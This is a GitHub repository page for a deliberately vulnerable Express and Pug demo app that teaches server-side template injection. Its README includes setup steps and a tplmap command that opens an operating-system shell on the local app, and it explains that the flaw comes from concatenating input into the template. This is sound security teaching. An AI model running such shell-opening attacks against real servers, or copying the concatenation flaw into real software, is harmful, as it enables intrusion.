Skip to content
/ ssti-express-pug Public

This application is a demonstration prototype just to show how to perform SSTI (Server side templating injection) attack.

License

MIT license
1 star 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xdbe-appsec/ssti-express-pug

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
app.js
app.js
 
 
index.pug
index.pug
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

Hands-on Express SSTI

This application is a demonstration prototype just to show how to perform SSTI (Server side templating injection) attack. This application use Express and Pug as templating engine. This tutorial is based on https://appsec.amanvir.io/exploring-template-injection

Setting-up

  • Install nodejs

  • Install dependencies

$ npm install
$ git clone https://github.com/epinna/tplmap.git
$ cd tplmap
$ virtualenv --python=/usr/bin/python2.7 venv
$ source ./venv/bin/activate
$ pip install -r requirements.txt
  • Start application
$ node app.js

SSTI attack

(venv)$ ./tplmap.py --engine pug --os-shell -u http://localhost:3000/?name=bob

In this example, the template is built by concatenation instead of using interpolation in order to escape data

About

This application is a demonstration prototype just to show how to perform SSTI (Server side templating injection) attack.

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

1 star

Watchers

2 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages